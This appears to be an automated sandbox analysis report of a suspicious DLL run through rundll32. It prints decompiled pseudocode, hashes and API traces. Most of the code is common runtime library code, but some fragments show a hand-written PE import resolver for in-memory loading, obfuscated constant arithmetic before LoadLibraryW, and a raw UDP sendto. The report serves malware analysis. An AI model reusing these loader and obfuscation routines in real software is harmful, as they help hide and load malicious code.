Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction ID: 3243c1bb31c4da8a8ed3b9d60ce207d24ba739ee5e1db1414c8eeda74806f304
Opcode Fuzzy Hash: c12eecb807ab7f0029ae595babd55ab8876d87e96eec09ecdb4c3faaf2806783
Instruction Fuzzy Hash: 07018F374016AAB7EB229F60CC00AAF3A98EF447D0F018018FD049153AD731DA12BAA0

Uniqueness

Uniqueness Score: -1.00%

Function 1001D6BC, Relevance: 6.0, APIs: 4, Instructions: 47
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 89%

			E1001D6BC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t15;
				LONG* _t21;
				long _t23;
				void* _t31;
				LONG* _t33;
				void* _t34;
				void* _t35;

				_t35 = __eflags;
				_t29 = __edx;
				_t25 = __ebx;
				_push(0xc);
				_push(0x1002fae0);
				E1001984C(__ebx, __edi, __esi);
				_t31 = E1001BF79(__edx, __edi, _t35);
				_t15 =  *0x1005826c; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E1001A549(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10058170; // 0x4ec1330
					if(__eflags != 0) {
						__eflags = _t33;
						if(_t33 != 0) {
							_t23 = InterlockedDecrement(_t33);
							__eflags = _t23;
							if(_t23 == 0) {
								__eflags = _t33 - 0x10057d48;
								if(__eflags != 0) {
									_push(_t33);
									E10016380(_t25, _t31, _t33, __eflags);
								}
							}
						}
						_t21 =  *0x10058170; // 0x4ec1330
						 *(_t31 + 0x68) = _t21;
						_t33 =  *0x10058170; // 0x4ec1330
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E1001D757();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				if(_t33 == 0) {
					E10017DA6(_t25, _t29, _t31, 0x20);
				}
				return E10019891(_t33);
			}

APIs

Part of subcall function 1001BF79: __getptd_noexit.LIBCMT ref: 1001BF7A
Part of subcall function 1001BF79: __amsg_exit.LIBCMT ref: 1001BF87

__amsg_exit.LIBCMT ref: 1001D6E8
__lock.LIBCMT ref: 1001D6F8
InterlockedDecrement.KERNEL32(?), ref: 1001D715
InterlockedIncrement.KERNEL32(04EC1330), ref: 1001D740

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
String ID:
API String ID: 2880340415-0
Opcode ID: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction ID: ba7e7af5003a78fddfad0021ce05134b2f36e9a59f0d2c47ef46babd1389d2ef
Opcode Fuzzy Hash: c820c896aabaa0a2095c39d05bd9b26938a44304a92efda62120de517e880afa
Instruction Fuzzy Hash: 95016D39904A21EBEB41FB65988679D77A4FF05790F11410AE804AF291DB34E9C2CB95

Uniqueness

Uniqueness Score: -1.00%

Function 100126F9, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E100126F9(void* __ecx, CHAR* _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HRSRC__* _t8;
				void* _t9;
				void* _t11;
				void* _t14;
				void* _t15;
				void* _t16;
				struct HINSTANCE__* _t17;
				void* _t18;

				_t14 = 0;
				_t11 = 0;
				_t19 = _a4;
				_t18 = __ecx;
				if(_a4 == 0) {
					L4:
					_t16 = E100122B0(_t11, _t18, _t11);
					if(_t11 != 0 && _t14 != 0) {
						FreeResource(_t14);
					}
					return _t16;
				}
				_t17 =  *(E1000D5EC(0, 0, _t15, _t19) + 0xc);
				_t8 = FindResourceA(_t17, _a4, 0xf0);
				if(_t8 == 0) {
					goto L4;
				}
				_t9 = LoadResource(_t17, _t8);
				_t14 = _t9;
				if(_t14 != 0) {
					_t11 = LockResource(_t14);
					goto L4;
				}
				return _t9;
			}

APIs

FindResourceA.KERNEL32(?,?,000000F0), ref: 1001271B
LoadResource.KERNEL32(?,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012727
LockResource.KERNEL32(00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 10012734
FreeResource.KERNEL32(00000000,00000000,?,?,?,?,1000C840,?,?,10008B31), ref: 1001274F

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Resource$FindFreeLoadLock
String ID:
API String ID: 1078018258-0
Opcode ID: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction ID: 32ecfa8a0ceb179aec2dc768c20ccd4f8790d9104fa4174b83ef058a4c527ff5
Opcode Fuzzy Hash: 8a3f5fca82a0f9630a7b8cc452aba64c847f2dafa8f29946bde4c5ad79aa4676
Instruction Fuzzy Hash: 54F090762042226FA3019B675C88A3BB7ECEFC55E2B110039FE04D6291EE35CC629771

Uniqueness

Uniqueness Score: -1.00%

Function 10001360, Relevance: 6.0, APIs: 4, Instructions: 40
networkCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E10001360(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				short _v20;
				short _v22;
				char _v24;
				intOrPtr _v28;
				signed int _t15;
				short _t18;
				intOrPtr _t31;
				signed int _t33;

				_t15 =  *0x10057a08; // 0xfbf2b489
				_v8 = _t15 ^ _t33;
				_v28 = __ecx;
				_t18 = E100174D0(_t31,  &_v24, 0, 0x10);
				_v24 = 2;
				__imp__#11(_a4);
				_v20 = _t18;
				__imp__#9(_a8);
				_v22 = _t18;
				__imp__#20(_a12, _a16, 0,  &_v24, 0x10);
				return E100167D5(_v28, __ebx, _v8 ^ _t33, _a12, _t31, __esi,  *((intOrPtr*)(_v28 + 0x24)));
			}

0x10001366
0x1000136d
0x10001370
0x1000137b
0x10001383
0x1000138d
0x10001393
0x1000139b
0x100013a1
0x100013bc
0x100013cf

APIs

_memset.LIBCMT ref: 1000137B
inet_addr.WS2_32(?), ref: 1000138D
htons.WS2_32(?), ref: 1000139B
sendto.WS2_32(?,?,00000002,00000000,00000002,00000010), ref: 100013BC

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _memsethtonsinet_addrsendto
String ID:
API String ID: 1158618643-0
Opcode ID: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction ID: 4ca8e198367322d4385a70dad1c3d41f0382a071c465ebc2c9307440f54d584b
Opcode Fuzzy Hash: 55dc4d04b4578ce397bb679e501a1161249c23db44447d4e71df0ac46d681eb6
Instruction Fuzzy Hash: D0017CB590020DABDB00DFA4CC86EAE77B8FF48300F104419F905AB281EB70AA40DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000CCD3, Relevance: 6.0, APIs: 4, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000CCD3() {
				intOrPtr _t16;
				struct HWND__* _t19;
				intOrPtr _t23;
				intOrPtr* _t28;
				void* _t29;

				_t28 =  *((intOrPtr*)(_t29 - 0x20));
				_t23 =  *((intOrPtr*)(_t29 - 0x24));
				if( *((intOrPtr*)(_t29 - 0x28)) != 0) {
					E10012913(_t23, 1);
				}
				if( *((intOrPtr*)(_t29 - 0x2c)) != 0) {
					EnableWindow( *(_t29 - 0x14), 1);
				}
				if( *(_t29 - 0x14) != 0) {
					_t19 = GetActiveWindow();
					_t34 = _t19 -  *((intOrPtr*)(_t28 + 0x20));
					if(_t19 ==  *((intOrPtr*)(_t28 + 0x20))) {
						SetActiveWindow( *(_t29 - 0x14));
					}
				}
				 *((intOrPtr*)( *_t28 + 0x60))();
				E1000C6E6(_t23, _t28, 0, _t28, _t34);
				if( *((intOrPtr*)(_t28 + 0x58)) != 0) {
					FreeResource( *(_t29 - 0x18));
				}
				_t16 =  *((intOrPtr*)(_t28 + 0x44));
				return E10017C60(_t16);
			}

APIs

EnableWindow.USER32(?,00000001), ref: 1000CCF3
GetActiveWindow.USER32 ref: 1000CCFE
SetActiveWindow.USER32(?,?,00000024,100014EC,00000000,FBF2B489), ref: 1000CD0C
FreeResource.KERNEL32(?,?,00000024,100014EC,00000000,FBF2B489), ref: 1000CD28

Part of subcall function 10012913: EnableWindow.USER32(?,FBF2B489), ref: 10012920

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$ActiveEnable$FreeResource
String ID:
API String ID: 253586258-0
Opcode ID: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction ID: b9d50a594c6b72ab84edc47d27728691b22d7b2ae70339502ef362fb55dd66ce
Opcode Fuzzy Hash: 5728dce3dbdb708f9e7fb54369dca357d78a73ff54a3e2536421aa2b19b7c5fa
Instruction Fuzzy Hash: 97F04F3890071DDBEF12DB64C98599DBBF2FF48781B60002AE442722A5CB326D81DF51

Uniqueness

Uniqueness Score: -1.00%

Function 1000AD21, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E1000AD21(void* __ecx) {
				signed int _v8;
				char _v16;
				char _v18;
				char _v280;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				long _t14;
				intOrPtr _t15;
				char* _t18;
				intOrPtr _t21;
				intOrPtr _t33;
				signed int _t36;

				_t11 =  *0x10057a08; // 0xfbf2b489
				_v8 = _t11 ^ _t36;
				_t35 = 0x104;
				_t14 = GetModuleFileNameA( *(__ecx + 0x44),  &_v280, 0x104);
				if(_t14 == 0 || _t14 == 0x104) {
					L4:
					_t15 = 0;
					__eflags = 0;
				} else {
					_t18 = PathFindExtensionA( &_v280);
					_t35 = "%s.dll";
					asm("movsd");
					asm("movsw");
					_t32 =  &_v280;
					_t41 = _t18 -  &_v280 + 7 - 0x106;
					asm("movsb");
					_t33 = _t33;
					if(_t18 -  &_v280 + 7 > 0x106) {
						goto L4;
					} else {
						E1000A7B3(_t21,  &_v280, _t33, "%s.dll", _t36, _t18,  &_v18 - _t18,  &_v16);
						_t15 = E1000AA3A(_t21,  &_v280, _t33, "%s.dll", _t41,  &_v280);
					}
				}
				return E100167D5(_t15, _t21, _v8 ^ _t36, _t32, _t33, _t35);
			}

APIs

GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 1000AD47
PathFindExtensionA.SHLWAPI(?), ref: 1000AD5D

Part of subcall function 1000A7B3: _strcpy_s.LIBCMT ref: 1000A7BF

Part of subcall function 1000AA3A: __EH_prolog3.LIBCMT ref: 1000AA59
Part of subcall function 1000AA3A: GetModuleHandleA.KERNEL32(kernel32.dll,00000058), ref: 1000AA7A
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 1000AA8B
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC1
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AAC9
Part of subcall function 1000AA3A: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 1000AADD
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(?), ref: 1000AB01
Part of subcall function 1000AA3A: ConvertDefaultLocale.KERNEL32(000003FF), ref: 1000AB07
Part of subcall function 1000AA3A: GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 1000AB40

Strings

%s.dll, xrefs: 1000AD63

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressFileNameProc$ExtensionFindH_prolog3HandlePath_strcpy_s
String ID: %s.dll
API String ID: 3444012488-3668843792
Opcode ID: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction ID: a3b0371864cf8cb86b39257a88ab5a21b33b2e0076ae9bf6281b2400efea00f1
Opcode Fuzzy Hash: 6c30b6a237bf11204af5acb5ac5b7830e50b8e52d34c93bd03a652aa76484c2b
Instruction Fuzzy Hash: AD01F972A00018AFEF08DB74CD45DEE73B8DF46740F4102AAE906D3544EA70AB848662

Uniqueness

Uniqueness Score: -1.00%

Function 10002670, Relevance: 5.2, APIs: 4, Instructions: 181
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10002670(intOrPtr __ecx, intOrPtr* _a4) {
				void* _v8;
				intOrPtr* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _v24;
				intOrPtr _v28;
				signed int* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _t114;
				intOrPtr _t116;
				intOrPtr _t133;
				intOrPtr _t138;
				void* _t202;
				void* _t203;

				_v44 = __ecx;
				_v20 =  *((intOrPtr*)(_a4 + 4));
				_v16 = 1;
				_v12 =  *_a4 + 0x80;
				if( *((intOrPtr*)(_v12 + 4)) != 0) {
					_v8 = _v20 +  *_v12;
					while(IsBadReadPtr(_v8, 0x14) == 0 &&  *((intOrPtr*)(_v8 + 0xc)) != 0) {
						_t114 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c))))(_v20 +  *((intOrPtr*)(_v8 + 0xc)),  *((intOrPtr*)(_a4 + 0x28)));
						_t203 = _t202 + 8;
						_v36 = _t114;
						if(_v36 != 0) {
							_t116 = E10001F00( *((intOrPtr*)(_a4 + 8)), 4 +  *(_a4 + 0xc) * 4);
							_t202 = _t203 + 8;
							_v28 = _t116;
							if(_v28 != 0) {
								 *((intOrPtr*)(_a4 + 8)) = _v28;
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 8)) +  *(_a4 + 0xc) * 4)) = _v36;
								 *(_a4 + 0xc) =  *(_a4 + 0xc) + 1;
								if( *_v8 == 0) {
									_v32 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								} else {
									_v32 = _v20 +  *_v8;
									_v24 = _v20 +  *((intOrPtr*)(_v8 + 0x10));
								}
								while( *_v32 != 0) {
									if(( *_v32 & 0x80000000) == 0) {
										_v40 = _v20 +  *_v32;
										_t133 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36, _v40 + 2,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t133;
									} else {
										_t138 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x20))))(_v36,  *_v32 & 0x0000ffff,  *((intOrPtr*)(_a4 + 0x28)));
										_t202 = _t202 + 0xc;
										 *_v24 = _t138;
									}
									if( *_v24 != 0) {
										_v32 =  &(_v32[1]);
										_v24 = _v24 + 4;
										continue;
									} else {
										_v16 = 0;
										break;
									}
								}
								if(_v16 != 0) {
									_v8 = _v8 + 0x14;
									continue;
								}
								 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
								SetLastError(0x7f);
								break;
							}
							 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x24))))(_v36,  *((intOrPtr*)(_a4 + 0x28)));
							SetLastError(0xe);
							_v16 = 0;
							break;
						}
						SetLastError(0x7e);
						_v16 = 0;
						break;
					}
					return _v16;
				}
				return 1;
			}

APIs

IsBadReadPtr.KERNEL32(00000000,00000014,?,?,?,?,10002C4E,00000000,00000000), ref: 100026C5
SetLastError.KERNEL32(0000007E), ref: 10002707

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ErrorLastRead
String ID:
API String ID: 4100373531-0
Opcode ID: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction ID: 5b18a635dcf056017fd1ee77a603d3a0bb8baed770e763f1765233b10108ec1d
Opcode Fuzzy Hash: c2a98b38cbef77d555c79c56aa9516de66013d98deec03bde9f9d281594a25e0
Instruction Fuzzy Hash: 7381BAB4A05209DFDB04CF94C880A9EB7B1FF88354F248159E819AB355D735EE82CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1001431B, Relevance: 5.0, APIs: 4, Instructions: 37
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 82%

			E1001431B(void* __ebx, void* __esi, void* __ebp, signed int _a4) {
				void* __edi;
				struct _CRITICAL_SECTION* _t4;
				void* _t7;
				void* _t10;
				signed int _t11;
				void* _t14;
				intOrPtr* _t15;
				void* _t17;

				_t17 = __ebp;
				_t14 = __esi;
				_t7 = __ebx;
				_t11 = _a4;
				_t20 = _t11 - 0x11;
				if(_t11 >= 0x11) {
					_t4 = E1000A0DB(__ebx, _t10, _t11, __esi, _t20);
				}
				if( *0x1005aac0 == 0) {
					_t4 = E100142F7();
				}
				_push(_t7);
				_push(_t17);
				_push(_t14);
				_t15 = 0x1005ac78 + _t11 * 4;
				if( *_t15 == 0) {
					EnterCriticalSection(0x1005ac60);
					if( *_t15 == 0) {
						_t4 = 0x1005aac8 + _t11 * 0x18;
						InitializeCriticalSection(_t4);
						 *_t15 =  *_t15 + 1;
					}
					LeaveCriticalSection(0x1005ac60);
				}
				EnterCriticalSection(0x1005aac8 + _t11 * 0x18);
				return _t4;
			}

APIs

EnterCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014357
InitializeCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014366
LeaveCriticalSection.KERNEL32(1005AC60,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 10014373
EnterCriticalSection.KERNEL32(?,?,?,?,?,10013A10,00000010,00000008,1000D61A,1000D5BD,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB), ref: 1001437F

Part of subcall function 1000A0DB: __CxxThrowException@8.LIBCMT ref: 1000A0EF
Part of subcall function 1000A0DB: __EH_prolog3.LIBCMT ref: 1000A0FC

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$Exception@8H_prolog3InitializeLeaveThrow
String ID:
API String ID: 2895727460-0
Opcode ID: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction ID: b2ae72b8ab0fae698251e24a42d2174316ff56aad592cf34d272a36c1b8e20b9
Opcode Fuzzy Hash: fc52205701aaf5afb0ce0b222181c69e48b6197276059f190c1bff8ca6cb0e4a
Instruction Fuzzy Hash: 05F090739002169BE700DF59CC89A1ABBA9FBC32A5F93011AF14096121DB3199C5CA61

Uniqueness

Uniqueness Score: -1.00%

Function 1001398E, Relevance: 5.0, APIs: 4, Instructions: 31
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E1001398E(long* __ecx, signed int _a4) {
				void* _t9;
				struct _CRITICAL_SECTION* _t12;
				signed int _t14;
				long* _t16;

				_t16 = __ecx;
				_t1 =  &(_t16[7]); // 0x1005aaa8
				_t12 = _t1;
				EnterCriticalSection(_t12);
				_t14 = _a4;
				if(_t14 <= 0) {
					L5:
					LeaveCriticalSection(_t12);
					return 0;
				}
				_t3 =  &(_t16[3]); // 0x3
				if(_t14 >=  *_t3) {
					goto L5;
				}
				_t9 = TlsGetValue( *_t16);
				if(_t9 == 0 || _t14 >=  *((intOrPtr*)(_t9 + 8))) {
					goto L5;
				} else {
					LeaveCriticalSection(_t12);
					return  *((intOrPtr*)( *((intOrPtr*)(_t9 + 0xc)) + _t14 * 4));
				}
			}

APIs

EnterCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 10013997
TlsGetValue.KERNEL32(1005AA8C,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139AC
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139C2
LeaveCriticalSection.KERNEL32(1005AAA8,?,?,?,10013DFF,?,00000004,1000D5FB,1000A0F5,1000B1E7,?,1000B878,00000004,1000ADCB,00000004,10001441), ref: 100139CD

Memory Dump Source

Source File: 00000004.00000002.247805728.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.247799893.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247870468.0000000010029000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.247887534.0000000010032000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.247951846.0000000010056000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247958973.000000001005A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.247967564.000000001005D000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$EnterValue
String ID:
API String ID: 3969253408-0
Opcode ID: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction ID: ae8276b6876f5357c50f650584214137971e28de593e3cdb7c29343fae997712
Opcode Fuzzy Hash: 8c266227b3abe2b759591ba9b775a43eab1fad3fbd471f069813da335311fd75
Instruction Fuzzy Hash: 27F012762006529FD710DF65CC8C90B77EDEF84291327D856E84697152D770F856CF50

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4940 Parent PID: 328 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	18.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	1077
Total number of Limit Nodes:	15

Executed Functions

Function 048552B9, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 58
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E048552B9(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t47;
				struct HINSTANCE__* _t59;
				signed int _t61;
				signed int _t62;
				WCHAR* _t68;

				_push(_a12);
				_t68 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0486FE29(_t47);
				_v24 = _v24 & 0x00000000;
				_v28 = 0x68392e;
				_v16 = 0xf5950b;
				_v16 = _v16 ^ 0xb3325752;
				_v16 = _v16 ^ 0xe58473b2;
				_v16 = _v16 ^ 0x56462a2c;
				_v8 = 0x3988bb;
				_t61 = 0x3a;
				_v8 = _v8 / _t61;
				_v8 = _v8 + 0xf338;
				_v8 = _v8 << 5;
				_v8 = _v8 ^ 0x0035ea14;
				_v12 = 0xe53120;
				_v12 = _v12 ^ 0xa236e8c8;
				_t62 = 0x62;
				_v12 = _v12 / _t62;
				_v12 = _v12 ^ 0x01ab7b97;
				_v20 = 0x973198;
				_v20 = _v20 * 0x60;
				_v20 = _v20 ^ 0x38bce55b;
				E0485EB52(_t62, _t62, 0xeec842c3, 0xab, 0xa2289af1);
				_t59 = LoadLibraryW(_t68); // executed
				return _t59;
			}

0x048552c0
0x048552c3
0x048552c5
0x048552c8
0x048552cc
0x048552cd
0x048552d2
0x048552d9
0x048552e2
0x048552e9
0x048552f0
0x048552f7
0x048552fe
0x0485530a
0x0485530f
0x04855314
0x0485531b
0x0485531f
0x04855326
0x0485532d
0x04855337
0x0485533f
0x04855342
0x04855349
0x04855360
0x04855363
0x04855376
0x0485537f
0x04855385

APIs

LoadLibraryW.KERNEL32 ref: 0485537F

Strings

.9h, xrefs: 048552D9
,*FV, xrefs: 048552F7
1, xrefs: 04855326

Memory Dump Source

Source File: 00000005.00000002.251018853.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true

Associated: 00000005.00000002.251013263.0000000004850000.00000004.00000001.sdmp Download File
Associated: 00000005.00000002.251051869.0000000004876000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4850000_rundll32.jbxd

Yara matches

Similarity

API ID: LibraryLoad
